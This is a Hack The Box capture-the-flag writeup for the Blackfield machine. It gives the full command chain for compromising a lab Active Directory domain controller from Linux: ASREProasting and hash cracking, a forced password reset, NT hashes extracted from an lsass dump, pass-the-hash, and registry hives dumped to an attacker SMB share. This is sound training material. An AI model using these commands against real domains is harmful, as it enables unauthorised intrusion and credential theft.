Open in app

Sign in

Write

Sign in

HTB Blackfield - full linux pwn with Exegol writeup

This writeup is based on Shutdown method presented at a Hack the box France meetup.

Wlayzz
7 min readMar 21, 2022

This pwn is based on full linux approach. We will never run powershell, windows commands.

To simply our hacking journey, I highly recommend you to use Exegol. If you don’t know Exegol, it’s a hacking environment like Kali linux with a lot of powerful tools already installed.

The best features on Exegol in my opinion is :

  • Powerfull history & autocompletion for commands lines with parameters already completed for you, you just need to replace values.
  • Segmentation environment for pentest engagement
  • Some PR in advance (Impacket)
  • The latest release of tools (Bloodhound v4)
  • And some more.

Are you excited about Exegol ? Just follow the instructions on Github repository. I highly recommend installing the full version (this can take a while & about 25go). Now you have installed Exegol, we are ready to go.

Run an Exegol container with htb vpn config

Reconnaissance

Let’s run a quick nmap recon.

nmap -sS -v -Pn -T5 10.10.10.192

Based on these ports, we can assume we face a domain controller.

Let’s continue with enum4linux.

enum4linux-ng -A 10.10.10.192

This is a lot of information, firstly let’s configure our /etc/resolv.conf with information we got for DNS resolution.

Secondly, enum4linux tell us that guest session is working on smb (line 55). It also returns that null session is working (line 53) but it’s a false positive (cf STATUS_ACCESS_DENIED every time it’s trying dumping things with smb).

Let’s try guest session with smb using smbmap (you can put whatever you want as guest session name).

smbmap -H 10.10.10.192 -u 'wlayzz'

Interesting, we have some uncommon shares: forensic & profiles$. We only have access to profiles$, so let’s dive in with smbclient.

smbclient.py BLACKFIELD/wlayzz@10.10.10.192 -no-pass

It seems like we have folders labeled with users of the domain. I found nothing interesting in folders, but with all these usernames we can try ASREProast attack (learn more on thehacker.recipes).

ASREProast

To perform this technique, we need to create a file with all the usernames. Just copy-past the console output and make some bash command.

rev command reverse strings
awk ‘{print $1}’ command to get the first column

Now with our list of users, let’s do the attack.

GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users -dc-ip 10.10.10.192 BLACKFIELD.local/
ASREProast attack
Result of ASREProast

On the output file ASREProastables.txt, the script found an account support with hashed password, this is possible because Kerberos pre-authentication is not required for this user.

Moving now with hashcat to try cracking this hash.

hashcat --status --hash-type 18200 --attack-mode 0 ASREProastables.txt /usr/share/wordlists/rockyou.txt
hashcat using rockyou wordlist
Password of support account cracked

Now, let’s immediately check if the cracked password for support is valid with LDAP module on CrackMapExec.

cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' --kdcHost 10.10.10.192

I think it’s time to get an overview of relation in ActiveDirectory using BloodHound.

BloodHound

Before we start, we need to run the neo4j database.

Then run the extraction script of bloodhound.

You must have some json files on your workdir. Next we have to import them in neo4j database.

Due to an error on bloodhound v4 we need to import files manually on the interface. Run bloodhound to have the interface, then click on the upload data on the right (red box on screen below).

Firstly, we are going to mark user support as owned. Search for the user on the top input.

Now let’s see the next jump we can make with this user. Click on the menu on left on search input, navigate on Analysis tab and go to Custom Queries and on Tigers love pepper part, then click on Next steps from owned users.

First thing we see is that support has ForceChangePassword right on audit2020 account.

ForceChangePassword

As support account has ForceChangePassword right on audit2020 account, we are going to change the password of this account.

net rpc password 'audit2020' '123Soleil!' -U 'BLACKFIELD'/'support'%'#00^BlackKnight' -S 'dc01.blackfield.local'

Now don’t forget to set user as owned on bloodhound and check if we can jump on another target.

No jump possible, let’s go back to smb shares and check audit2020 right.

smbmap -H 10.10.10.192 -u 'audit2020' -p '123Soleil!'

We have reading right on forensic, let’s dive into this share.

smbclient.py 'BLACKFIELD'/'audit2020':'123Soleil!'@10.10.10.192

lsass.zip looks interesting, download it with get lsass.zip.

It seems someone dump lsass process (learn more on thehacker.recipes). On the hacker recipes we learn that a ProcDump has probably been done, also we find a command with pypykatz to use our lsass.DMP file.

pypykatz lsa minidump lsass.dmp

We retrieve 3 accounts with their NT hashes:
- svc_backup 9658d1d1dcd9250115e2205d9f48400d
- DC01$ b624dc83a27cc29da11d9bf25efea796
- Administrator 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

Pass the hash

We need to verify if these accounts works using pass the hash technique.

cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'  --kdcHost 10.10.10.192

Only svc_backup account can authenticate and cme tell us this account is maybe admin.

Check smb shares rights.

smbmap -H 10.10.10.192 -u 'svc_backup' -p '9658d1d1dcd9250115e2205d9f48400d:9658d1d1dcd9250115e2205d9f48400d'

We can read C$, maybe our first flag here. Get into with smbclient.

smbclient.py -hashes :9658d1d1dcd9250115e2205d9f48400d 'BLACKFIELD'/'svc_backup'@10.10.10.192

Now let’s root this box ! 😈

Mark this account as owned on bloodhound and check jumps.

Backup Operators

We can see svc_backup is member of Backup Operators. Looking on hacker recipes and this seems juicy.

Thanks to Shutdown recent pull request, we can make an attack from linux using Impacket by dumping registry hives directly on domain controller and this leads to DCSync.

Adding save function to reg.py for Backup Operators to Domain Admin exploitation by ShutdownRepo ·…

Adding the save feature to reg.py to allow for remote saving of registry hives. The feature can be used to escalate…

github.com

To perform this attack, you need to run on a first terminal an smb server.

smbserver.py -smb2support WLAYZZ .

Then run on a second terminal the impacket script with your IP and your smb server name.

reg.py -hashes :9658d1d1dcd9250115e2205d9f48400d 'BLACKFIELD.local/svc_backup@10.10.10.192' backup -o '\\10.10.16.2\WLAYZZ'

Dumping hives can take a moment, it’s time to take a coffee. ☕

Now that we had backup hives, we can make a secretsdump.

For an unquoted reason, pass the hash doesn’t work with Administrator account, but we got this password in clear.

cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'Administrator' -p '###_ADM1N_3920_###'  --kdcHost 10.10.10.192

Last move to get root flag ? Let’s see.

smbclient.py 'BLACKFIELD'/'Administrator':'###_ADM1N_3920_###'@10.10.10.192

We did it. 🎉 🥳
I hope you liked this box as much as I did.

I want to thanks Shutdown for his works on the hacker recipes, exegol and Impacket. 💪

Also thanks to Euz and the Hack the box France community. 🤟

Find me on twitter Wlayzz. Good hacking 🏴‍☠️

Some memes about Exegol

Htb Writeup
Htb
Active Directory Security
Active Directory

--

--

Wlayzz

Written by Wlayzz

3 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams